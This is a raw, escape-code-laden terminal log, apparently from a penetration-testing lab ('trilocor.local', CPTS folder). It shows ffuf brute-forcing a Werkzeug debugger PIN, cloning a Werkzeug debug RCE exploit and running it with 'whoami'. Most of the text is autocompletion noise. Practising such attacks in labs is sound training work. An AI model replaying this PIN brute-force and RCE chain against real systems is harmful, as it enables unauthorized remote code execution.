#[3B#[114C#[7m5-digits-00000-99999.txt #[0m
#[76C4-digits-0000-9999.txt
#[4A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/5-digits-00000-99999.txt#[24m -fw
4#[K#[32C[9:01:32]#[0m#[47D
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[J-request-proto
#[Jrequest.txt #[JUninstaller.lnk #[Juser_list.txt
#[JZoneTransfer.txt #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/5-digits-00000-99999.txt#[24m#[1m #[0m -fw
4#[K#[31C[9:01:32]#[0m#[46D##[0m -fw 4 ########[?1l#>#[?2004l
#[J#[A#[107C
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://trilocor.local:7777/console?
__debugger__=yes&cmd=pinauth&pin=FUZZ&s=VOTZu249LbYRGXDEKzLs
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/5-digits-00000-99999.txt
:: Header : Accept-Encoding: gzip, deflate, br
:: Header : Referer: http://trilocor.local:7777/console
:: Header : Connection: close
:: Header : Host: trilocor.local:7777
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0)
Gecko/20100101 Firefox/115.0
:: Header : Accept: */*
:: Header : Accept-Language: en-US,en;q=0.5
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 4
________________________________________________
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/NIX01##]1;~/CPTS/NIX01##]7;file:///home/kali/CPTS/NIX01#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m968#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:02:01]#[148D#[?1h#=#[?
2004hg#git clone https://github.com/its-arun/Werkzeug-Debug-
RCE.git#[60D#[7mg#[7mi#[7mt#[7m #[7mc#[7ml#[7mo#[7mn#[7me#[7m
#[7mh#[7mt#[7mt#[7mp#[7ms#[7m:#[7m/#[7m/#[7mg#[7mi#[7mt#[7mh#[7mu#[7mb#[7m.#[7mc#[7
mo#[7mm#[7m/#[7mi#[7mt#[7ms#[7m-#[7ma#[7mr#[7mu#[7mn#[7m/
#[7mW#[7me#[7mr#[7mk#[7mz#[7me#[7mu#[7mg#[7m-#[7mD#[7me#[7mb#[7mu#[7mg#[7m-
#[7mR#[7mC#[7mE#[7m.#[7mg#[7mi#[7mt#[27m#[60D#[27mg#[27mi#[27mt#[27m
#[27mc#[27ml#[27mo#[27mn#[27me#[27m
#[27mh#[27mt#[27mt#[27mp#[27ms#[27m:#[27m/#[27m/#[27mg#[27mi#[27mt#[27mh#[27mu#[27m
b#[27m.#[27mc#[27mo#[27mm#[27m/#[27mi#[27mt#[27ms#[27m-
#[27ma#[27mr#[27mu#[27mn#[27m/
#[27mW#[27me#[27mr#[27mk#[27mz#[27me#[27mu#[27mg#[27m-
#[27mD#[27me#[27mb#[27mu#[27mg#[27m-
#[27mR#[27mC#[27mE#[27m.#[27mg#[27mi#[27mt#[60D#[32mg#[32mi#[32mt#[39m#[57C#[?
1l#>#[?2004l
#[J#[A#[66C
#]2;kali@kali:~/CPTS/NIX01##]1;~/CPTS/NIX01##]7;file:///home/kali/CPTS/NIX01#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m969#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:05:31]#[148D#[?1h#=#[?
2004hc##[1m#[31mc#[0m#[39m##[1m#[31mc#[0m#[39m#[90md
~/CPTS/NIX01#[39m#[14D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[4
9m
#[0;1;2mcommand#[0m
#[0mc89 c99 cacaclock cacaplay cacaview
cadaver calc_stat callgrind_control
cardos-tool catdoc catman cbfstool cc
ccache2john cd-create-profile cd-fix-profile
cd-iccdump cftp3 cg_annotate cg_diff cg_merge
check_forensic cherryd3 cherrytree
chgrp chkdvifont chmem chmod chpasswd
chromeos-tpm-recovery cifsiostat cisco-decrypt
ckbcomp clang++-15 clang++-16 cluster cmedb colcrt
colormgr colrm
column comm compress convert count-14 count-
15 count-16 coveralls
cp cpan cpanel_json_xs cpgr cpio
cracf2john cracklib-check cracklib-unpacker
crackmapexec create-cracklib-dict createdb createlang cron
cryptcat cryptoflex-tool cupsctl
cupsdisable cupsenable cupstestppd curl cvtsudoers cython3
#[J#[30m#[104m(MORE)#[39m#[49m#[11A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mc#[0m#[39m#[90md
~/CPTS/NIX01#[39m#[K#[124C[9:05:31]#[0m#[147D##[1m#[31mc#[1m#[31md#[0m#[39m###[0m#[
32mc#[0m#[32md#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mcd #[Jcd-create-profile #[Jcd-fix-profile #[Jcd-iccdump
#[Jcd-it8 #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m#[90m
~/CPTS/NIX01#[39m#[K#[124C[9:05:31]#[0m#[146D###[32mc#[32md#[32m #[39m
#[J#[A#[9C####[32mc#[32md#[39m#[39m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mWerkzeug-Debug-RCE#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[90m~/CPTS/NIX01#[39m#[K#[124C[9:05:31]#[0m#[145D#[39mW#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[11D##[4mW#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mWerkzeug-Debug-RCE#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4mW#[24m#[K#[135C[9:05:31]#[0m#[144D##[4mW#[4me#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mWerkzeug-Debug-RCE#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4mWe#[24m#[K#[134C[9:05:31]#[0m#[143D##[4me#[4mr#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mWerkzeug-Debug-RCE#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4mWer#[24m#[K#[133C[9:05:31]#[0m#[142D
#[J#[A#[12C##[4mr#[4mkzeug-Debug-RCE#[1m#[4m/#[0m#[24m
#[J#[A#[27C
#[J#]2;cd Werkzeug-Debug-RCE##]1;cd##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/NIX01/Werkzeug-Debug-RCE##]1;..eug-Debug-RCE##]7;file:///
home/kali/CPTS/NIX01/Werkzeug-Debug-RCE#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01/Werkzeug-Debug-
RCE#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m970#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:05:34]#[148D#[?1h#=#[?
2004hc##[1m#[31mc#[0m#[39m##[1m#[31mc#[0m#[39m#[90md Werkzeug-Debug-
RCE#[39m#[20D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mc89 c99 cacaclock cacaplay cacaview
cadaver calc_stat callgrind_control
cardos-tool catdoc catman cbfstool cc
ccache2john cd-create-profile cd-fix-profile
cd-iccdump cftp3 cg_annotate cg_diff cg_merge
check_forensic cherryd3 cherrytree
chgrp chkdvifont chmem chmod chpasswd
chromeos-tpm-recovery cifsiostat cisco-decrypt
ckbcomp clang++-15 clang++-16 cluster cmedb colcrt
colormgr colrm
column comm compress convert count-14 count-
15 count-16 coveralls
cp cpan cpanel_json_xs cpgr cpio
cracf2john cracklib-check cracklib-unpacker
crackmapexec create-cracklib-dict createdb createlang cron
cryptcat cryptoflex-tool cupsctl
cupsdisable cupsenable cupstestppd curl cvtsudoers cython3
#[J#[30m#[104m(MORE)#[39m#[49m#[11A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mc#[0m#[39m#[90md Werkzeug-Debug-
RCE#[39m#[K#[118C[9:05:34]#[0m#[147D##[1m#[31mc#[1m#[31mh#[0m#[39m#[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[19D#[90mmod 600 id_rsa#[39m#[14D
#[J#[0;1;2mcommand#[0m
#[0mchacl chafa chage chardet
chardetect chartex chat chattr chcon
chcpu chdir check_forensic checkgid
checkXML5 cherryd3 cherrytree chfn chgpasswd
chgrp chkdvifont chkfont chmem chmod
chntpw choom chown chpasswd
#[Jchpwd_dirhistory #[Jchpwd_recent_filehandler #[Jchromeos-tpm-recovery
#[Jchroot #[Jchrt #[Jchruby_prompt_info #[Jchsh #[Jchvt #[J
#[5A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mch#[0m#[39m#[90mmod 600
id_rsa#[39m#[K#[123C[9:05:34]#[0m#[146D###[1m#[31mc#[1m#[31mh#[1m#[31mm#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mchmem #[Jchmod#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mchm#[0m#[39m#[90mod 600
id_rsa#[39m#[K#[123C[9:05:34]#[0m#[145D##[1m#[31mm#[1m#[31mo#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mchmod#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mchmo#[0m#[39m#[90md 600
id_rsa#[39m#[K#[123C[9:05:34]#[0m#[144D##[1m#[31mo#[1m#[31md#[0m#[39m######[0m#[32m
c#[0m#[32mh#[0m#[32mm#[0m#[32mo#[0m#[32md#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mchmod#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m#[90m 600 id_rsa#[39m#[K#[123C[9:05:34]#[0m#[143D##[32md#[32m
#[39m
#[J#[A#[12C###[32md#[39m#[39m
#[J#[0;1;2mwho#[0m
#[0ma -- all
g -- group
o -- others
u -- owner
#[0;1;2moperator#[0m
#[J#[0m+ #[J- #[J\=#[J#[7A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m #[90m600 id_rsa#[39m#[K#[123C[9:05:34]#[0m#[142D#[39m_#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[9D
#[J#[0;1;2mwho#[0m
#[0ma -- all
g -- group
o -- others
u -- owner
#[0;1;2moperator#[0m
#[J#[0m+ #[J- #[J\=#[J#[7A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m _#[K#[132C[9:05:34]#[0m#[141D# ##[90m600 id_rsa#[39m#[10D
#[J#[0;1;2mwho#[0m
#[0ma -- all
g -- group
o -- others
u -- owner
#[0;1;2moperator#[0m
#[J#[0m+ #[J- #[J\=#[J#[7A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m #[90m600 id_rsa#[39m#[K#[123C[9:05:34]#[0m#[142D#[39m+#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[9D
#[J#[A#[13C#[90mx SQLiteStudio-3.4.4-linux-x64-installer.run#[39m#[44D
#[J#[0;1;2mprivilege#[0m
#[0mg -- group's current permissions
o -- others' current permissions
r -- read
s -- set uid/gid
t -- sticky
u -- owner's current permissions
w -- write
x -- execute
#[JX -- execute only if directory or executable to
another#[J#[10A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m +#[90mx SQLiteStudio-3.4.4-linux-x64-
installer.run#[39m#[K#[88C[9:05:34]#[0m#[141D#[39mx
#[J#[0;1;2mprivilege#[0m
#[0mg -- group's current permissions
o -- others' current permissions
r -- read
s -- set uid/gid
t -- sticky
u -- owner's current permissions
w -- write
#[JX -- execute only if directory or executable to
another#[J#[9A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m +x#[90m SQLiteStudio-3.4.4-linux-x64-
installer.run#[39m#[K#[88C[9:05:34]#[0m#[140D#[39m
#[J#[A#[15C
#[J#[0;1;2mfile#[0m
#[J#[0mREADME.md #[Jwerkzeug.py#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m +x #[90mSQLiteStudio-3.4.4-linux-x64-
installer.run#[39m#[K#[88C[9:05:34]#[0m#[139D#[39me#[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[41D#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[0mREADME.md werkzeug.py
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103mre#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m +x e#[K#[129C[9:05:34]#[0m#[138D# ##[90mSQLiteStudio-3.4.4-
linux-x64-installer.run#[39m#[42D
#[J#[0;1;2mfile#[0m
#[J#[0mREADME.md #[Jwerkzeug.py#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m +x #[90mSQLiteStudio-3.4.4-linux-x64-
installer.run#[39m#[K#[88C[9:05:34]#[0m#[139D#[39mw#[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[41D##[4mw#[24m
#[J#[0;1;2mfile#[0m
#[J#[0mwerkzeug.py#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m +x #[4mw#[24m#[K#[129C[9:05:34]#[0m#[138D##[4mw#[4me#[24m
#[J#[0;1;2mfile#[0m
#[J#[0mwerkzeug.py#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m +x #[4mwe#[24m#[K#[128C[9:05:34]#[0m#[137D##[4me#[4mr#[24m
#[J#[0;1;2mfile#[0m
#[J#[0mwerkzeug.py#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m +x #[4mwer#[24m#[K#[127C[9:05:34]#[0m#[136D
#[J#[A#[18C##[4mr#[4mkzeug.py#[24m
#[J#[0;1;2mfile#[0m
#[J#[0mwerkzeug.py#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mchmod#[39m +x #[4mwerkzeug.py#[24m#[K#[119C[9:05:34]#[0m#[128D#[?1l#>#[?
2004l
#[J#[A#[26C
#[J#]2;chmod +x werkzeug.py##]1;chmod##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/NIX01/Werkzeug-Debug-RCE##]1;..eug-Debug-RCE##]7;file:///
home/kali/CPTS/NIX01/Werkzeug-Debug-RCE#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01/Werkzeug-Debug-
RCE#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m971#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:05:39]#[148D#[?1h#=#[?
2004hp##[1m#[31mp#[0m#[39m##[1m#[31mp#[0m#[39m#[90mython2.7 joomlascan.py -u
http://blog.trilocor.local#[39m#[52D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m
#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mpar2create parecord paster3 pathchk
pax11publish pdfannotextractor pdf-parser pdftosrc
pdvitype pfc pg_backupcluster pg_buildext
pg_restore phar8.2 php php8.2
pic pico pidof pip
pipal piv-tool pkcon pkill
plasma-apply-colorscheme plasma-localegen-helper plasma-shutdown plasmawindowed
pltotf pod2usage podselect pon
post_fuzz pppstats printafm prosody2john
prtstat ps2pdf psfstriptable pstat
ptftopl pth-winexe ptrepack pttree
pw-dump pwhistory_helper pw-metadata pw-mididump
pwsh py2lcov py3rsa-decrypt pybabel
pylnk3 pystache python3-pasteurize python3-qr
#[J#[30m#[104m(MORE)#[39m#[49m#[9A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mp#[0m#[39m#[90mython2.7 joomlascan.py -u
http://blog.trilocor.local#[39m#[K#[86C[9:05:39]#[0m#[147D##[1m#[31mp#[1m#[31my#[0m
#[39m
#[J#[0;1;2mcommand#[0m
#[0mpy2lcov py3clean py3compile
py3rsa-decrypt py3rsa-encrypt py3rsa-keygen
py3rsa-priv2pub py3rsa-sign py3rsa-verify
py3versions pybabel pybabel-python3
pyclean pycompile pydoc
pydoc2 pydoc2.7 pydoc3
pydoc3.11 pydoc3.12 pyenv_prompt_info
pyfiglet pygettext2 pygettext2.7
pygettext3 pygettext3.11 pygettext3.12
pygmentex pygmentize pyhtmlizer3
pyi-archive_viewer pyi-bindepend pyi-grab_version
pyi-makespec pyinstaller pyi-set_version
pylnk3 pylupdate5 pylupdate6
pyppeteer-install pypykatz pyrcc5
pyserial-miniterm pyserial-ports py-sneakers
pyspnego-parse pystache pystache-test
python python2 python2.7
python2.7-config python3 python3.11
python3.11-config python3.12 python3.12-config
python3-config python3-futurize python3-pasteurize
python3-qr python-argcomplete-check-easy-install-script python-dotenv
python-faraday pythran pythran-config
#[Jpyuic5 #[Jpyuic6
#[Jpyversions #[Jpyvnc.py #[Jpywerview #[J
#[13A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mpy#[0m#[39m#[90mthon2.7 joomlascan.py -u
http://blog.trilocor.local#[39m#[K#[86C[9:05:39]#[0m#[146D###[1m#[31mp#[1m#[31my#[1
m#[31mt#[0m#[39m##[1m#[31mt#[1m#[31mh#[0m#[39m##[1m#[31mh#[1m#[31mo#[0m#[39m#[30m#[
103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mcommand#[0m
#[0mpython python2 python2.7 python2.7-config python3
python3.11 python3.11-config
python3.12 python3.12-config python3-config python3-futurize python3-
pasteurize python3-qr python-argcomplete-check-easy-install-script
python-dotenv python-faraday
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mpython#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mpytho#[0m#[39m#[90mn2.7 joomlascan.py -u
http://blog.trilocor.local#[39m#[K#[86C[9:05:39]#[0m#[143D##[1m#[31mo#[1m#[31mn#[0m
#[39m#######[0m#[32mp#[0m#[32my#[0m#[32mt#[0m#[32mh#[0m#[32mo#[0m#[32mn#[39m
#[J#[0;1;2mcommand#[0m
#[0mpython python2 python2.7 python2.7-config python3
python3.11 python3.11-config
python3.12 python3.12-config python3-config python3-futurize python3-
pasteurize python3-qr python-argcomplete-check-easy-install-script
#[Jpython-dotenv #[Jpython-faraday #[J
#[4A#[0m#[27m#[24m#[0m
#[6C#[32mpython#[39m#[90m2.7 joomlascan.py -u
http://blog.trilocor.local#[39m#[K#[86C[9:05:39]#[0m#[142D##[32mn#[32m2#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mpython2 #[Jpython2.7 #[Jpython2.7-
config#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mpython2#[39m#[90m.7 joomlascan.py -u
http://blog.trilocor.local#[39m#[K#[86C[9:05:39]#[0m#[141D##[32m2#[32m #[39m#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[45D
#[J#[A#[14C###[32m2#[39m#[39m
#[J#[0;1;2mfile#[0m
#[0mREADME.md #[01;32mwerkzeug.py#[0m*
#[0;1;2mPython script#[0m
#[J#[01;32mwerkzeug.py#[0m*#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mpython2#[39m#[K#[132C[9:05:39]#[0m#[140Dw##[4mw#[24m#[30m#[103m#[39m#[49m#
[30m#[103m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[01;32mwerkzeug.py#[0m*
#[0;1;2mPython script#[0m
#[01;32mwerkzeug.py#[0m*
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mwerkzeug.py#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mpython2#[39m
#[4mw#[24m#[K#[130C[9:05:39]#[0m#[139D##[4mw#[4me#[24m#[30m#[103m#[39m#[49m#[30m#[1
03m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[01;32mwerkzeug.py#[0m*
#[0;1;2mPython script#[0m
#[01;32mwerkzeug.py#[0m*
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mwerkzeug.py#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mpython2#[39m
#[4mwe#[24m#[K#[129C[9:05:39]#[0m#[138D##[4me#[4mr#[24m#[30m#[103m#[39m#[49m#[30m#[
103m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[01;32mwerkzeug.py#[0m*
#[0;1;2mPython script#[0m
#[01;32mwerkzeug.py#[0m*
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mwerkzeug.py#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mpython2#[39m
#[4mwer#[24m#[K#[128C[9:05:39]#[0m#[137D##[4mr#[4mk#[24m#[30m#[103m#[39m#[49m#[30m#
[103m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[01;32mwerkzeug.py#[0m*
#[0;1;2mPython script#[0m
#[01;32mwerkzeug.py#[0m*
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mwerkzeug.py#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mpython2#[39m #[4mwerk#[24m#[K#[127C[9:05:39]#[0m#[136D
#[J#[A#[18C##[4mk#[4mzeug.py#[24m
#[J#[0;1;2mfile#[0m
#[01;32mwerkzeug.py#[0m*
#[0;1;2mPython script#[0m
#[J#[01;32mwerkzeug.py#[0m*#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mpython2#[39m #[4mwerkzeug.py#[24m#[K#[120C[9:05:39]#[0m#[129D##[4my#[4m
#[24m
#[J#[A#[26C###[4my#[24m#[24m
#[J#[0;1;2mfile#[0m
#[J#[0mREADME.md #[J#[01;32mwerkzeug.py#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mpython2#[39m #[4mwerkzeug.py#[24m#[K#[120C[9:05:39]#[0m#[128Dt
#[J#[0;1;2mfile#[0m
#[J#[0mREADME.md #[J#[01;32mwerkzeug.py#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mpython2#[39m #[4mwerkzeug.py#[24m
trilocor.local:7777#[K#[100C[9:05:39]#[0m#[108Dw##[4mw#[24m
#[J#[0;1;2mfile#[0m
#[J#[01;32mwerkzeug.py#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mpython2#[39m #[4mwerkzeug.py#[24m trilocor.local:7777
#[4mw#[24m#[K#[98C[9:05:39]#[0m#[107D##[4mw#[4mh#[24m###[24mw#[24mho
#[J#[A#[52C
#]2;kali@kali:~/CPTS/NIX01/Werkzeug-Debug-RCE##]1;..eug-Debug-RCE##]7;file:///
home/kali/CPTS/NIX01/Werkzeug-Debug-RCE#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01/Werkzeug-Debug-
RCE#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m972#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:06:05]#[148D#[?1h#=#[?
2004hs##[1m#[31ms#[0m#[39m##[1m#[31ms#[0m#[39m#[90mearchsploit
werkzeug#[39m#[20D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0msakis3g samba_downgrade_db samba-log-parser samba-regedit
samba-tool scanimage scriptlive
sdiff sed see select-default-
wordlist sensortag seq setleds
setmetamode setpriv sha1sum sha256deep
sha384sum shasum shodan
showconsolefont showkey SIPdump slattach
sleep smbcquotas smbd
smbtar snmpbulkwalk snmpgetnext snmpkey
snmpnetstat snmpstatus snmptest
snmpwalk software-properties-qt spa-json-dump speech-dispatcher
spiderfoot spiderfoot-cli splitfont
sqlite3 ssh ssh-add sshd
ssh-keygen ssh-keyscan sslh
sslscan sspr2john startplasma-wayland stl2gts
sudoedit sum sumtool
sunrpcfuzz svlc svn svnauthz
svnbench svnsync swapoff
switch_root sync systemd systemd-cgls
systemd-confext systemd-escape systemd-stdio-bridge
#[J#[30m#[104m(MORE)#[39m#[49m#[12A#[0m#[27m#[24m#[0m
#[6C#[1m#[31ms#[0m#[39m#[90mearchsploit
werkzeug#[39m#[K#[118C[9:06:05]#[0m#[147D##[1m#[31ms#[1m#[31mu#[0m#[39m#[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[19D###[0m#[32ms#[0m#[32mu#[39m#[90mdo apt-get install --yes
filezilla#[39m#[34D
#[J#[0;1;2mcommand#[0m
#[J#[0msu #[Jsudo #[Jsudo-command-line #[Jsudoedit #[Jsudo_logsrvd
#[Jsudoreplay #[Jsudo_sendlog #[Jsulogin #[Jsum #[Jsumtool #[Jsunrpcfuzz
#[Jsuperiotool #[Jsuspend #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msu#[39m#[90mdo apt-get install --yes
filezilla#[39m#[K#[103C[9:06:05]#[0m#[146D###[32ms#[32mu#[32md#[39m####[1m#[31ms#[1
m#[31mu#[1m#[31md#[0m#[39m##[1m#[31md#[1m#[31mo#[0m#[39m#####[0m#[4m#[32ms#[0m#[4m#
[32mu#[0m#[4m#[32md#[0m#[4m#[32mo#[24m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msudo #[Jsudo-command-line #[Jsudoedit
#[Jsudo_logsrvd #[Jsudoreplay #[Jsudo_sendlog
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m#[90m apt-get install --yes
filezilla#[39m#[K#[103C[9:06:05]#[0m#[144D##[4m#[32mo#[4m#[32m #[24m#[39m
#[J#[A#[11C###[4m#[32mo#[24m#[39m#[24m#[39m
#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mexternal command#[0m
#[0mairmon-ng ant atk6-fake_router26 cd-fix-
profile chromeos-tpm-recovery cluster comm
ebtables-save find-debuginfo fsck.vfat gcc-nm
gpic gxl2dot htmove
impacket-keylistattack impacket-sniff kismet kwalletmanager5
mcafee_epo2john nfsstat oLschema2ldif
orca pfc phar8.2 pipal
pw-mididump r2pm redsocks
sed see seq smbd
snmpgetnext tsk_loaddb uclampset
unshare urlscan valgrind-listener vcstime
x86_64-linux-gnu-ld xfwm4 x-window-manager
#[J#[30m#[104m(MORE)#[39m#[49m#[8A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[90mapt-get install --yes
filezilla#[39m#[K#[103C[9:06:05]#[0m#[143D#[39mg#[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[30D##[32mg#[39m#[90mem install
bundler#[39m#[18D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mexternal command#[0m
#[0mg++-13 galera_recovery gapplication gatttool gawk
gawkbug gbak gc
gcc-ar-13 gcc-nm gcov-dump-13 gcov-tool-13 gcr-viewer
